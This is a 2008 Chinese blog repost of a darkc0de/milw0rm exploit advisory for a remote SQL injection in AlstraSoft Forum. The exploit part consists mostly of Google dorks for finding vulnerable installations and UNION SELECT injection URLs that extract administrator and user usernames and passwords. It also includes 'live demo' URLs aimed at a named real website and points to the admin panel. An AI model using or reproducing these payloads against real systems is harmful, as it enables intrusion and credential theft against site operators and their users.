Sep082008

远程SQL注入漏洞

作者:天晴   发布:2008-09-08 13:48   分类:Articles   阅读:   抢沙发  

Altrasoft Forum (cat) Remote SQL Injection Vulnerability
################################################################
#       .___             __          _______       .___        #
#     __| _/____ _______|  | __ ____    _      __| _/____    #
#    / __ |\__  \_  __   |/ // ___/  /_    / __ |/ __    #
#   / /_/ | / __ |  | /    <  \___  \_/   / /_/   ___/   #
#   \____ |(______/__|  |__|_ \_____>\_____  /\_____|\____   #
#        /                  /             /                 #
#                   ___________   ______  _  __                #
#                 _/ ___\_  __ \_/ __ / / /                #
#                   \___|  | /  ___/     /                 #
#                  \___  >__|    \___  >/\_/                  #
#      est.2007        /            /   forum.darkc0de.com   #
################################################################
# –d3hydr8 – rsauron – baltazar – sinner_01 – C1c4Tr1Z – beenu#
#  —  QKrun1x  – skillfaker – FeDeReR – Optyx – Nuclear 
#                   and all darkc0de members                —#
################################################################
#
# Author: r45c4l and P47r1ck
#
# Home  : www.darkc0de.com
#
# Email : r45c4l@hotmail.com, p47r1ckro[at]gmail[dot]com
#
# Share the c0de!
#
################################################################
#
# Exploit: Altrasoft Forum (cat) Remote SQL Injection Vulnerability
#
#
# App Name:  AlstraSoft Forum
#
# App Home: http://www.alstrasoft.com/
#
# Dork: inurl:index.php?menu=showcat=
# Dork2: Powered By AlstraSoft Forum Pay Per Post Exchange
#
#
#
#
#
# POC: For Admin id and pass
#      index.php?menu=showcat&cat=-1+union+all+select+1,concat(auser,0x3a,apass),3+from+admin–
#
# P0C-2: For Users id and pass
#       index.php?menu=showcat&cat=-1+union+all+select+1,concat(username,0x3a,upass),3+from+users+limit+2,1–
#
# Live Demo: (For admin)
#
# http://payperpostpro.com/index.php?menu=showcat&cat=-1+union+all+select+1,concat(auser,0x3a,apass),3+from+admin–

# Live Demo: (For Users)
#  http://payperpostpro.com/index.php?menu=showcat&cat=-1+union+all+select+1,concat(username,0x3a,upass),3+from+users+limit+1,1–
#
#
# Admin panel is at http://site.com/admin
################################################################
# Vuln Discovered 7th Sep 2008

# milw0rm.com

本文固定链接: http://www.daopo.org/2008/09/08/remote-sql-injection-vulnerability/ | 天晴轩

该日志由 天晴 于2008年09月08日发表在 Articles 分类下, 你可以发表评论,并在保留原文地址及作者的情况下引用到你的网站或博客。
原创文章转载请注明: 远程SQL注入漏洞 | 天晴轩
关键字: , ,
【上一篇】
【下一篇】

您可能还会对这些文章感兴趣!

  1. PJBlog 3.0.6.170 cls_logAction.asp文件注入
  2. hzhost6.5又爆SQL注入漏洞
  3. PhpCms2007 sp6 SQL injection 0day
  4. SQL注射修改难猜解的MD5
  5. OBlog (tags.asp) Remote SQL Injection E
  6. Microsoft IE数据流处理远程代码执行漏洞
  7. 远程控制CMD
  8. 太阳远程控制1.5

远程SQL注入漏洞:等您坐沙发呢!

发表评论

快捷键:Ctrl+Enter